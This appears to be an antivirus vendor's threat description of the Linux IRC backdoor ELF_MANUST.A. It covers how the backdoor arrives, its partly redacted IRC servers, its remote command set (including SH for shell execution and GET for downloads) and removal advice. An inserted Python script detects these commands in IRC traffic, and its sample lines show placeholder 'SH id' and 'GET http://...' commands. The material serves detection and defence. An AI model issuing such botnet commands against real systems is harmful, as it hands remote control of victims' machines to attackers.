ELF_MANUST.A
Kaspersky: Backdoor.Linux.Tsunami.gen
Linux

Threat Type: Backdoor
Destructiveness: No
Encrypted: No
In the wild: Yes
OVERVIEW
This backdoor is involved in an exploit attack that targets a critical vulnerability in Ruby on Rails. It connects to an IRC server, from which it receives and executes commands issued by remote attackers, and it makes the affected system part of their botnet. Affected users may find the security of their systems compromised.
To get a one-glance comprehensive view of the behavior of this Backdoor, refer to the Threat Diagram shown below.

This backdoor may be dropped by other malware. It may be unknowingly downloaded by a user while visiting malicious websites.
It connects to Internet Relay Chat (IRC) servers.
TECHNICAL DETAILS
Arrival Details
This backdoor may be dropped by other malware.
It may be unknowingly downloaded by a user while visiting malicious websites.
Backdoor Routine
This backdoor connects to any of the following Internet Relay Chat (IRC) servers:
- {BLOCKED}u.ru
- {BLOCKED}.{BLOCKED}.124.120
It accesses a remote Internet Relay Chat (IRC) server where it receives the following commands from a remote malicious user:
- NICK {nick} - change IRC nick
- SERVER {server} - change IRC Server
- KILL - terminate itself
- GET {http address} {save as} - download files on the compromised system
- HELP - show Help Info (set of commands accepted)
- IRC {command} - send message to IRC Server
- SH {command} - execute command on the compromised system
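Because the command set above is fixed, the same list can drive a detection check over IRC traffic captured at a sensor or proxy. The following is an added example (not part of this description, and not Trend Micro's or the malware's code) that parses IRC PRIVMSG lines, matches the trailing text against the backdoor's command vocabulary and argument shapes, and reports hits; the sample lines and hostnames are constructed placeholders, and case-insensitive matching is an assumption.

```python
import re
from dataclasses import dataclass
from typing import Optional

# Commands ELF_MANUST.A accepts from its IRC controller, mapped to the
# (minimum, maximum) argument count each takes; None means no upper bound.
BOT_COMMANDS = {
    "NICK": (1, 1),     # NICK {nick}
    "SERVER": (1, 1),   # SERVER {server}
    "KILL": (0, 0),     # terminate itself
    "GET": (2, 2),      # GET {http address} {save as}
    "HELP": (0, 0),     # show help
    "IRC": (1, None),   # IRC {command}
    "SH": (1, None),    # SH {command}
}

# IRC PRIVMSG line shape: ":sender PRIVMSG target :text"
PRIVMSG_RE = re.compile(r"^:(?P<sender>\S+)\s+PRIVMSG\s+(?P<target>\S+)\s+:(?P<text>.*)$")

@dataclass
class Finding:
    sender: str
    target: str
    command: str
    args: list

def classify(line: str) -> Optional[Finding]:
    """Return a Finding if the PRIVMSG text looks like a bot command, else None."""
    m = PRIVMSG_RE.match(line.strip())
    if not m:
        return None                      # PING, JOIN, MODE etc. are not command carriers
    tokens = m.group("text").split()
    if not tokens:
        return None
    cmd, args = tokens[0].upper(), tokens[1:]   # assumption: bot matches case-insensitively
    if cmd not in BOT_COMMANDS:
        return None
    lo, hi = BOT_COMMANDS[cmd]
    if len(args) < lo or (hi is not None and len(args) > hi):
        return None                      # wrong arity: e.g. chat text "kill the lights"
    if cmd == "GET" and not args[0].lower().startswith(("http://", "https://")):
        return None                      # GET must carry an http address first
    return Finding(m.group("sender"), m.group("target"), cmd, args)

def scan(lines):
    """Run classify() over many lines and keep only the hits."""
    return [f for f in (classify(l) for l in lines) if f is not None]

# Constructed sample traffic; hosts are placeholders, not the page's indicators.
SAMPLE_LINES = [
    ":ctl!op@irc.example.invalid PRIVMSG #bots :SH id",
    ":ctl!op@irc.example.invalid PRIVMSG #bots :GET http://dl.example.invalid/x /tmp/x",
    ":alice!a@host.example.invalid PRIVMSG #chat :hello everyone",
    ":ctl!op@irc.example.invalid PRIVMSG #bots :KILL",
    ":bob!b@host.example.invalid PRIVMSG #chat :kill the lights please",
    ":ctl!op@irc.example.invalid PRIVMSG #bots :NICK",
    "PING :irc.example.invalid",
]

if __name__ == "__main__":
    for f in scan(SAMPLE_LINES):
        print(f"{f.sender} -> {f.target}: {f.command} {' '.join(f.args)}")
```

A bare HELP or KILL with no arguments is a weak signal on its own, so in practice weight SH and GET hits higher and correlate with the destination being an unexpected IRC server.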
SOLUTION
Scan your computer with your Trend Micro product to delete files detected as ELF_MANUST.A. If the detected files have already been cleaned, deleted, or quarantined by your Trend Micro product, no further step is required. You may opt to simply delete the quarantined files. Please check this Knowledge Base page for more information.